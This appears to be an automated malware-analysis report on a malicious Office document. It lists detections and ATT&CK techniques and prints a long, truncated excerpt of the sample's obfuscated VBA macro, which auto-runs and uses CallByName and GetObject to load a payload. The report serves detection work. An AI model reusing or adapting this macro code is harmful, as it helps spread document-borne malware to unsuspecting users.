Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the macros.bas file. The GetObject and CallByName functions are often used in conjunction with VBA macros to execute arbitrary code. The ClamAV detection further confirms its malicious nature. The VBA code appears to be obfuscated, but its structure suggests it is designed to download and execute a secondary payload.
Heuristics (5)
- ClamAV: Doc.Malware.Valyria-9761059-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41166 bytes |

SHA-256: f1f35bca24c9cb1da20cbfb2149b6f964805a346f0d474d8fa48615570e8980c

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim let2, let95(2) As Byte, let60(9) As Byte, let49(32) As Byte, let22(19) As Byte, let52(13) As Byte, let9(6) As Byte, let65(55) As Byte, let25(1269) As Byte, let63(5) As Byte, let10(38) As Byte, let75(38) As Byte, let62(1 To 255) As Byte

Private Sub let29()
    let95(2) = let62(110)
    let95(0) = let62(17)
    let95(1) = let62(71)
End Sub

Private Function let99(let84)
    Dim let37(1) As Byte, let05, let61, let53
    If let84 > (409020 / 1604) Then
        let05 = let7(let84, (-9458 + 9714))
        let53 = let84 / (1694464 / 6619)
        let61 = let53
    Else
        let05 = let84
    End If
    let37(0) = let05
    let37(1) = let61
    let99 = let37
End Function

Private Function let31(let34)
    On Error GoTo let98
    Dim let50, let30
    Do
        let30 = let34(let50)
        let50 = let50 + 1
    Loop
let98:
    let31 = let50 - 1
End Function

Private Function let15(let94, let33, let5, let6, let3, let88)
    On Error GoTo let01
    Set let15 = CallByName(let94, let33, let5, let3)
let01:
End Function

Private Sub Sub1_Layout()
    If let2 = 0 Then
        let2 = 21
        let41
    End If
End Sub

Private Sub let04()
    let10(15) = let62(112)
    let10(26) = let62(7)
    let10(34) = let62(158)
    let10(36) = let62(90)
    let10(5) = let62(229)
    let10(16) = let62(226)
    let10(27) = let62(64)
    let10(20) = let62(207)
    let10(28) = let62(39)
    let10(8) = let62(88)
    let10(32) = let62(16)
    let10(7) = let62(171)
    let10(17) = let62(13)
    let10(37) = let62(162)
    let10(4) = let62(206)
    let10(38) = let62(172)
    let10(35) = let62(133)
    let10(12) = let62(113)
    let10(1) = let62(102)
    let10(2) = let62(43)
    let10(30) = let62(93)
    let10(11) = let62(106)
    let10(25) = let62(97)
    let10(9) = let62(157)
    let10(0) = let62(19)
    let10(6) = let62(53)
    let10(24) = let62(253)
    let10(19) = let62(153)
    let10(21) = let62(113)
    let10(29) = let62(65)
    let10(10) = let62(225)
    let10(14) = let62(150)
    let10(31) = let62(23)
    let10(23) = let62(47)
    let10(13) = let62(75)
    let10(3) = let62(100)
    let10(18) = let62(130)
    let10(33) = let62(191)
End Sub

Private Function let59(let42)
    Set let59 = GetObject(let42)
End Function

Private Function let86(let08() As Byte, let69() As Byte, let90)
    Dim let89, let92
    On Error GoTo let91
    let92 = 1
    let89 = 0
    While let89 <= let90
        If let08(let89) <> let69(let89) Then
            let92 = 0
        End If
        let89 = let89 + 1
    Wend
    let86 = let92
    Exit Function
let91:
    let86 = 0
End Function

Private Function let41()
    Dim let39, let68, let40, let83() As Byte, let24, let06
    let06 = 1
    While let06 <= (-2515 + 2770)
        let62(let06) = let06
        let06 = let06 + 1
    Wend
    let02
    let04
    let24 = (1522432 / 5947)
    let14
    While let68 = 0
        let83 = CStr(let39)
        let40 = let31(let83())
        If let40 >= 1 Then
            let9(2) = let83(0) + (let83(1) * let24)
            If let40 >= 3 Then
                let9(3) = let83(2) + (let83(3) * let24)
                If let40 >= 5 Then
                    let9(4) = let83(4) + (let83(5) * let24)
                    If let40 >= 7 Then
                        let9(5) = let83(6) + (let83(7) * let24)
                        If let40 >= 9 Then
                            let9(6) = let83(8) + (let83(9) * let24)
                        End If
                    End If
                End If
            End If
        End If
        If let86(let51(let10(), let77(let9()), 38), let75, 38) = 1 Then
            let68 = 3356
        End If
        let39 = let39 + 1
    Wend
    If let68 = 3356 Then
        let19
    Else
        MsgBox let68
    End If
End Function

Private Sub let96()
    let49(22) = let62(91)
    let49(13) = let62(83)
    let49(23) = let62(88)
    let49(21) = let62(93)
    let49(32) = let62(34)
    let49(0) = let62(33)
    let49(15) = let62(33)
    let49(7) = let62(236)
    let49(29) = let62(103)
    let49(6) = let62(112)
    let49(11) = let62(51)
    let49(1) = let62(75)
    let49(31) = let62(80)
    let49(10) = let62(205)
    let49(16) = let62(203)
    let49(20) = let62(218)
    let49(19) = let62(224)
    let49(27) = let62(10)
    let49(14) = let62(193)
    let49(12) = let62(52)
    let49(9) = let62(173)
    let49(2) = let62(116)
    let49(8) = let62(83)
    let49(5) = let62(186)
    let49(4) = let62(237)
    let49(24) = let62(139)
    let49(25) = let62(6)
    ' ... (truncated)
```